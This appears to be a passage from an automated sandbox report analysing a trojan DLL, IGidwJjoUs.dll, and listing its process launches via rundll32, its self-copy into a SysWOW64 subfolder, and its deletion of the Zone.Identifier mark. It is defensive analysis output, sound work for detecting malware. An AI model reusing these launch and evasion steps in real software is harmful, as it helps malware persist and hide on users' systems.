                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010D261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BCE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B6869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010D20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010D1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ED20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ED1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBCF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ED0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB40E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ED1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB6869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBCE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ED261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBBD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECCD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EC970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ECE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EBCB13
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E7BAC90 appears 33 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E7A1DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E7BAC90 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E7A1DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: IGidwJjoUs.dllVirustotal: Detection: 18%
                      Source: IGidwJjoUs.dllReversingLabs: Detection: 17%
                      Source: IGidwJjoUs.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,akyncbgollmj
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nyd",czAZWAgsaZPj
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6888 -ip 6888
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 308
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6888 -ip 6888
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 304
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cwisdx\vimpwfmepmyc.nyd",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,Control_RunDLL
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,akyncbgollmj
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nyd",czAZWAgsaZPj
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Cwisdx\vimpwfmepmyc.nyd",Control_RunDLL
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6888 -ip 6888
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 308
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6888 -ip 6888
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 304
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER42EA.tmpJump to behavior
                      Source: classification engineClassification label: mal84.troj.evad.winDLL@36/14@0/2
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00ED1B99 CreateToolhelp32Snapshot,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\IGidwJjoUs.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6596:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6948:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6888
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: IGidwJjoUs.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: IGidwJjoUs.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: aUojrXoCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000011.00000002.954537444.0000000000492000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944571126.0000000000891000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944524592.0000000000DEA000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944726193.0000000000891000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944963869.0000000000897000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944733553.0000000000897000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944575719.0000000000897000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000011.00000003.944963869.0000000000897000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944733553.0000000000897000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944575719.0000000000897000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944564783.000000000088B000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.945060966.000000000088B000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000011.00000003.944571126.0000000000891000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944726193.0000000000891000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000003.962626767.00000000048D5000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.962922934.00000000048D5000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000011.00000003.944564783.000000000088B000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.945060966.000000000088B000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C6A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7C6A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010213E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B13E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C13E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B13E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_00EB13E7 push esi; retf
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7AE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nydJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nyd:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
